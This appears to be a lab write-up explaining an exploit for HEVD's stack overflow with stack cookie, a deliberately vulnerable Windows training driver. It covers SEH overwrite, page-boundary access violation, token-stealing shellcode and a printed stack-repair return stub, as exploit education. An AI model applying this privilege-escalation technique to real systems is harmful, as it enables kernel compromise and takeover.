The only viable option here is to make the vulnerable memcpy call itself first overwrite the buffer along with the saved stack cookie and the SEH handler pointer AND trigger an access violation exception: either by exceeding the size of the user-mode buffer and reading past the memory page that holds it, or by writing past the stack boundary (whichever happens first). Now, writing down the stack would completely wipe out all the older (parent) stack frames, making it super hard to return from the shellcode in a way that avoids crashing the system. Thus, having the kernel code read past the user-supplied user-mode buffer is a much better option, and I really like the way this has been solved in the original HEVD PoC (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c).

The entire payload that is written to the kernel stack is 532 bytes long: 512 bytes of the original buffer, 4 bytes of the stack cookie, 12 bytes of three other DWORDs that we don't care about (referred to in the payload as junk), and finally 4 bytes of the SEH handler. 512 + 4 + 12 + 4 = 532. This is the exact number of bytes that need to be written to the stack for the SEH handler pointer to be overwritten with a value we control.

Now, in order to trigger an access violation exception in the same operation (memcpy), just after our 532 bytes from the user-mode buffer are copied onto the kernel-mode stack, we want to place our 532-byte payload at the end of a page (the basic memory allocation unit provided by the OS memory manager, 4096 bytes by default). So from our user-mode program we allocate a separate page (a 4096-byte buffer). Then we put our payload into its tail (the last 532 bytes), so our payload starts at the 3565th byte and ends at the 4096th (with the last 4 bytes being the pointer to our shellcode).

    Finally, to trigger an access violation, we adjust the buffer size parameter sent encapsulated in the IRP, to exceed the size of our payload (so it must be bigger than 532, e.g. 536). This will cause memcpy running in kernel mode to attempt reading four bytes beyond the page our payload is located in. To make sure this causes an access violation, the page must not have an adjacent/neighbor page. So for example, if the virtual address of the user mode page allocated for the buffer with our payload is 0x00004000, with page size being 0x1000 (4096), the valid address range for this page will be 0x00004000 <--> 0x00004fff. Meaning that accessing address 0x00005000 or higher would mean accessing another page starting at 0x00005000 (thus we call it an adjacent/neighbor page). Since we want to achieve an access violation, we need to make sure that no memory is allocated for the current (exploit) process in that range. So we want just one, alone page allocated, reading past which causes an access violation.

There are a few ways to cause such a violation. For example, two adjacent pages can be allocated, the second one freed, and then the read operation triggered on the first one, with the size operand making it read beyond the first page into the second. This is the method employed by klue's PoC: https://github.com/klue/hevd, with his mmap and munmap wrappers around NtAllocateVirtualMemory and NtFreeVirtualMemory.

    Another one is to allocate the page in a way that ensures nothing else is allocated in the adjacent address space, which is what the official HEVD exploit does by using an alternative memory allocation method supported by Windows.

    Let's  analyze the code (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c).

First, we have the declarations. hFile is used for opening the driver object (in order to then send the IRP). PageSize is 0x1000 (4096). MemoryAddress is the pointer to the special page in which we are going to place our stack-smashing payload (528 bytes of junk plus 4 bytes overwriting the SEH handler pointer, pointing at our shellcode, located at the page's tail, starting at the 3565th byte). SuitableMemoryForBuffer is the pointer we are going to pass to HEVD as UserBuffer; it will point at the 3565th byte of the 4096-byte page allocated at MemoryAddress. EopPayload is another pointer to a user-mode location containing our shellcode (so the shellcode is in a separate user-mode buffer, not the special page we allocate for the stack-smashing payload):

    Variable declarations

Finally, there is SharedMemory: a handle to the mapped file object we are going to create (as an alternative way of allocating memory). Instead of requesting a new page allocation with VirtualAlloc, an empty, non-persisted memory-mapped file is created. Memory-mapped files are basically section objects (described properly in Windows Internals, Part 1, in the "Shared memory and mapped files" section), a mechanism used by Windows for sharing memory between processes (especially shared libraries loaded from disk); please see the official Microsoft documentation to find out more: https://docs.microsoft.com/en-us/dotnet/standard/io/memory-mapped-files.

    In this case, we are going to request creation of a "mapped file" object without any actual file, by providing INVALID_HANDLE_VALUE as the first argument to CreateFileMappingA - this scenario is mentioned in the manual page of this function (https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga):

    So it's basically a section ("mapped file") object only backed by the system paging file - in other words, a region in the system paging file that we can map to our process's address space and use just like (almost) a regular page:

    Creation of a mapped file object

    Now, we map that region into our address space:

    Mapping the object to the current process address space

    Now, we set the SuitableMemoryForBuffer pointer at the 3565th byte of the SharedMemoryAddress region (this is where we will place our 532-byte payload that will then be copied by the driver into a buffer on its stack):

    Setting the payload pointer at the 3565th byte of the 4096-byte memory region

    And we fill the entire region with 'A':

    Filling the entire 4096-byte region with 'A'

    Then eventually, the payload is finished by setting its last 4 bytes to the user-mode address of the shellcode (these bytes will overwrite the SEH handler). This is done in a somewhat indirect way: first the pointer (MemoryAddress) is written at offset 0x204 (516) - right past the XOR-ed stack cookie - and it then overwrites three of the following junk pointers, only to eventually set the new value for the SE handler:

    Grooming the buffer - this is tricky

    It seems that simply setting MemoryAddress to point at SuitableMemoryForBuffer + 0x210 directly (at the location that will overwrite the SE handler pointer) would do the trick as well - the other locations on the stack would be overwritten with meaningless 'A's anyway.

    Then finally, we trigger the creation of our IRP and send it to the driver, along with the pointer to the UserBuffer (SuitableMemoryForBuffer - the 3565th byte of the 4096-byte region) and the Size argument: SeHandlerOverwriteOffset + RAISE_EXCEPTION_IN_KERNEL_MODE. SeHandlerOverwriteOffset is just the size of our payload (532). RAISE_EXCEPTION_IN_KERNEL_MODE is just a numeric constant of 0x4, added only to make the read exceed the page boundary when counted from the 3565th byte provided as the beginning of the buffer to read from:

    Finally, talking to the driver

    Shellcode

    Our shellcode is a separate buffer in user mode, which will get executed by kernel-mode HEVD code instead of the legitimate exception handler - on modern kernels this would not get executed due to SMEP, but we're doing the very basics here.

    First of all, let me recommend ShellNoob. It's a neat tool I always use whenever I want to:

    • analyze a shellcode (a sequence of opcodes) or just some part of it,
    • write shellcode.

    In this case we will use a slightly modified version of the publicly available, common Windows 7 token-stealing payload (https://github.com/hasherezade/wke_exercises/blob/master/stackoverflow_expl/payload.h):

    After converting the shellcode to ASCII-hex and pasting it into shellnoob's input (opcode_to_asm), this is what we get:

    Our shellcode, executing in kernel mode, finds the SYSTEM process and then copies its access token over the token of the exploit process. This way the exploit process becomes NT AUTHORITY\SYSTEM. Have a look at https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c to see descriptions of all the individual assembly instructions in this payload. Pay attention to the fact that while the shellnoob output presents assembly in AT&T syntax, Payloads.c contains assembly in Intel syntax (this is why it's worth knowing both: http://staffwww.fullcoll.edu/aclifton/courses/cs241/syntax.html).

    This shellcode, however, requires one more adjustment.

    Clean return

    Now, the problem is, if we simply use this shellcode to exploit this particular vulnerability, the kernel will crash right after modifying the relevant access token. The reason for this is the return process and the messed-up stack. The problem - and the solution - are already well described at https://klue.github.io/blog/2017/09/hevd_stack_gs/. I myself had to get my head around the process my own way, to fully understand it and confirm (instead of just blindly running it and trusting it would work) that the return stub provided by klue is in fact the correct one:

    mov 0x78c(%esp), %edi
    mov 0x790(%esp), %esi
    mov 0x794(%esp), %ebx
    add $0x9b8, %esp
    pop %ebp
    ret $0x8

    So, the following return stub

    had to be replaced. Again, I used shellnoob to obtain the opcodes:

    Basically, the entire problem boils down to the fact that we need to return somewhere - and when we do, the stack needs to be aligned the same way it would be during normal execution.

    The entire process of aligning the stack boils down to three things. First, identifying where we will be returning to - and taking note of what the stack and the registers look like when the return to that location is made normally. Second, setting a breakpoint in our shellcode, to again take note of what the stack and the registers look like when our shellcode executes (it's convenient to use a hardcoded software breakpoint in the shellcode itself - just append 0xcc (int3) to it instead of the return stub). Third, comparing the state of the registers and the stack between the two stages, finding where the register values to restore are located in memory, restoring them, and finally adjusting the last one of them (ESP) and making the return.

    Running

    Source code can be found here.
